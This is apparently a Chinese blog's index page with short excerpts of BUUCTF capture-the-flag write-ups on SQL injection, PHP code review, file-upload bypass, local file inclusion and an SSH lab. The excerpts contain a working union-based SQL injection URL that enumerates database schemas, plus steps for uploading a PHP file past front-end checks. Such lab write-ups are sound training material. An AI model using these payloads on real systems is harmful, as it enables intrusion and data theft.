BUUCTF
oJiuJieZhong
这个作者很懒,什么都没留下…
展开
-
BUU SQL COURSE 1 1
http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,group_concat%28schema_name%29%20from%20information_schema.schemata--+http://6f38f91e-0206-4565-bdbb-186602b4bde9.node4.buuoj.cn:81/backe.原创 2021-10-20 15:29:24 · 1306 阅读 · 0 评论 -
BUUCTF CODE REVIEW
内容就如题,是一个代码审计。<?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */highlight_file(__FILE__);class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {原创 2021-10-15 16:09:23 · 522 阅读 · 0 评论 -
BUUCTF upload-labs
①这里是前端JS限制了我们只能上传特点格式的文件②这里我们可以在设置里面直接关闭网页的JS③或者通过抓包的形式,绕过前端验证④这里在burp suite中将jpg改成php⑤这里上传成功⑥我们也可以通过抓包的形式来了解文件上传的位置...原创 2021-10-11 14:10:50 · 3273 阅读 · 0 评论 -
BUUCTF BUU LFI COURSE 1
这是一道本地文件包含的题输入 ?file=/flag 即可看到flaghttp://c241d62f-732c-46d3-b45a-f3390d0411af.node4.buuoj.cn:81/?file=/flag原创 2021-10-11 10:14:08 · 994 阅读 · 0 评论 -
BUUCTF linux labs
①首先通过SSH连接到靶机,注意端口号②连接到靶机后通过ls就可以看到flag了③查看flag.txt原创 2021-10-11 10:08:58 · 254 阅读 · 0 评论